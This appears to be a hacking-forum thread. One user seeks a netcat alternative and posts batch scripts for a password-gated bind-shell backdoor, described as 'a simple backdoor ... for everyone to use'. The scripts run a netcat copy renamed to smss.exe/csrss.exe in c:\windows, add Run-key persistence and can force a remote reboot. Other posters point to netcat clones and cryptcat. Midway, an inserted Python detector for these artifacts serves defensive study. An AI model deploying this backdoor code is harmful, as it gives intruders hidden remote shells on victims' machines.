Full Version: Netcat Alternative
tstngry
- I need a program like or exactly like netcat, that executes .bat files correctly. I made a simple .bat file that reads a password from a file called config.dat, which is just a text file with a password and port in it. Then it requires you to enter that password to get a shell, i.e. run cmd.exe. The problem is netcat just goes ahead and runs cmd by itself. It does the same thing when I add options after the login; it just skips the login and goes right to the options.

- In conclusion, I need a program that is similar to netcat that executes .bat files correctly. If someone could make a similar thing or mod netcat THAT WOULD BE GREAT! Also, if you would like me to post the .bat files I can do that also. If this doesn't make sense then tell me that too. Thanks for your help
Phil
Hmm man, I posted sbd, a netcat clone, in the trial forum.. but of course use the search, here are already 2 versions of netcat with password auth. Posted one with bats and the other one with another exe, stuff like that.
Tyrano
Maybe I'm confused, but why can't you transfer your batch file via netcat? It seems fairly simple to me; I mean if you got netcat to run on the target, why do you think the batch file won't run?
Partizaan
I have something like that

PM me your mail or give me an FTP and I will up it to ya ...

Or if somebody has webspace I will up it for everybody ...

Lanig
Why don't you just use the cryptcat -k option?
link:
http://sourceforge.net/projects/cryptcat/
tstngry
-Thanks for all the help. The problem is not that I can't get the .bat to run; it is that it does not run correctly. I added password protection of sorts to it, but it just skips over it. I use the command nc.exe -L -p 60000 -t -e login.bat.

CODE

@echo off
color 2
:start
cls

if "%1"=="/c" goto :commandl
if "%1"=="/r" goto :remove

set /p tst=%1
if "%tst%"=="r" goto :rage
goto :start

:rage
FOR /F "TOKENS=2* DELIMS=:" %%A IN ('type config.dat ^| FIND "pass"') DO FOR %%B IN (%%A) DO SET passwd=%%B
cls
echo.
echo.
echo   8 888888888o.            .8.               ,o888888o.    8 8888888888  
echo   8 8888    `88.          .888.             8888     `88.  8 8888        
echo   8 8888     `88         :88888.         ,8 8888       `8. 8 8888        
echo   8 8888     ,88        . `88888.        88 8888           8 8888        
echo   8 8888.   ,88'       .8. `88888.       88 8888           8 888888888888
echo   8 888888888P'       .8`8. `88888.      88 8888           8 8888        
echo   8 8888`8b          .8' `8. `88888.     88 8888   8888888 8 8888        
echo   8 8888 `8b.       .8'   `8. `88888.    `8 8888       .8' 8 8888        
echo   8 8888   `8b.    .888888888. `88888.      8888     ,88'  8 8888        
echo   8 8888     `88. .8'       `8. `88888.      `8888888P'    8 888888888888
echo.
echo.
set /p ri=  #:
if "%ri%"=="%passwd%" cmd
GOTO :rage


:remove
attrib -s -h -r -a c:\windows\config.dat
attrib -s -h -r -a c:\windows\login.bat
attrib -s -h -r -a c:\windows\csrss.exe
attrib -s -h -r -a c:\windows\smss.exe
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v Rundllcms /f
del config.dat
del smss.exe
echo del c:\windows\csrss.exe >> c:\clean.bat
echo del c:\windows\login.bat >> c:\clean.bat
echo REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v clean /f >> c:\clean.bat
echo del c:\clean.bat >> c:\clean.bat
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v clean /t REG_SZ  /d "c:\clean.bat" /f
:pick
cls
echo.
echo.
echo    Everything is set to be removed but you must restart their computer. You
echo   can do it now or you can let them do it later.
echo.
set /p ans=  Do you want to restart now? (y or n):
if "%ans%"=="y" shutdown -r -f -t 00
if "%ans%"=="n" GOTO :option
goto :pick

:commandl
@echo off
FOR /F "TOKENS=2* DELIMS=:" %%A IN ('type c:\windows\config.dat ^| FIND "port"') DO FOR %%B IN (%%A) DO SET port=%%B
c:\windows\smss.exe csrss.exe -L -p %port% -t -e c:\windows\login.bat
exit


Now this reads a password from a file called config.dat in the form of:
CODE

pass: password
port: 32


-When I execute this .bat file normally in Windows I have no problems, but when netcat executes it when I connect to the port, it just gives the shell automatically. I am aware of other .bat files that have password protection, but I just wanted to know why this didn't work and/or if someone could make it work. Thanks again
-BTW the whole point of this is to make a simple backdoor that can be easily configured for everyone to use. I would be happy to post it and how to use it when I am finished.
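
For defenders, the artifacts in the post above translate into three simple process-creation checks. This is an added example, not part of the original thread; the event field names Image and CommandLine follow Sysmon's process-creation events, and the sample events (including the C:\Tools path) are constructed.

```python
import re
from ntpath import basename, dirname

# System process names the thread's batch file reuses for files in c:\windows.
# The genuine binaries live in System32, so any other directory is suspect.
SYSTEM32_ONLY = {"smss.exe", "csrss.exe"}
RUN_KEY_ADD = re.compile(r"\breg(?:\.exe)?\s+add\s+\S*\\CurrentVersion\\Run", re.I)

def is_exec_listener(cmdline):
    """Netcat-style flags: listen (-l/-L), a port (-p N) and -e <program>."""
    args = cmdline.split()
    listen = port = execs = False
    for i, arg in enumerate(args):
        if not re.fullmatch(r"-[A-Za-z]+", arg):
            continue
        nxt = args[i + 1] if i + 1 < len(args) else ""
        listen |= "l" in arg.lower()
        port |= arg.endswith("p") and nxt.isdigit()
        execs |= arg.endswith("e") and bool(nxt) and not nxt.startswith("-")
    return listen and port and execs

def findings(event):
    """Return the names of the rules that one process-creation event trips."""
    image, cmdline = event["Image"].lower(), event["CommandLine"]
    hits = []
    if is_exec_listener(cmdline):
        hits.append("listener-with-exec")
    if basename(image) in SYSTEM32_ONLY and dirname(image) != r"c:\windows\system32":
        hits.append("system-name-outside-system32")
    if RUN_KEY_ADD.search(cmdline):
        hits.append("run-key-add")
    return hits

# Constructed sample events (not real logs); commands mirror the ones in the thread.
EVENTS = [
    {"Image": r"C:\Tools\nc.exe", "CommandLine": "nc.exe -L -p 60000 -t -e login.bat"},
    {"Image": r"C:\Windows\csrss.exe",
     "CommandLine": r"csrss.exe -L -p 32 -t -e c:\windows\login.bat"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows"
                    r'\CurrentVersion\Run\ /v clean /t REG_SZ /d "c:\clean.bat" /f'},
    {"Image": r"C:\Windows\System32\csrss.exe", "CommandLine": "csrss.exe"},
    {"Image": r"C:\Windows\System32\ping.exe", "CommandLine": "ping -l 1000 -n 4 10.0.0.1"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(findings(ev) or "clean", "<-", ev["CommandLine"])
```

The flag check keys on the argument pattern rather than the file name, so it still fires when the listener binary has been renamed.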
saetji
Problem I had with bat files was that * as a password worked
tstngry
- When I get mine to work it doesn't have the problem of the * password. I have a much more simple one that works without the * password. It is:
CODE

@echo off
color 2
:rage
cls
echo.
echo.
echo   8 888888888o.            .8.               ,o888888o.    8 8888888888  
echo   8 8888    `88.          .888.             8888     `88.  8 8888        
echo   8 8888     `88         :88888.         ,8 8888       `8. 8 8888        
echo   8 8888     ,88        . `88888.        88 8888           8 8888        
echo   8 8888.   ,88'       .8. `88888.       88 8888           8 888888888888
echo   8 888888888P'       .8`8. `88888.      88 8888           8 8888        
echo   8 8888`8b          .8' `8. `88888.     88 8888   8888888 8 8888        
echo   8 8888 `8b.       .8'   `8. `88888.    `8 8888       .8' 8 8888        
echo   8 8888   `8b.    .888888888. `88888.      8888     ,88'  8 8888        
echo   8 8888     `88. .8'       `8. `88888.      `8888888P'    8 888888888888
echo.
echo.
set /p ri=  #:
if "%ri%"=="yourpwhere" cmd
GOTO :rage


-I am pretty sure that works.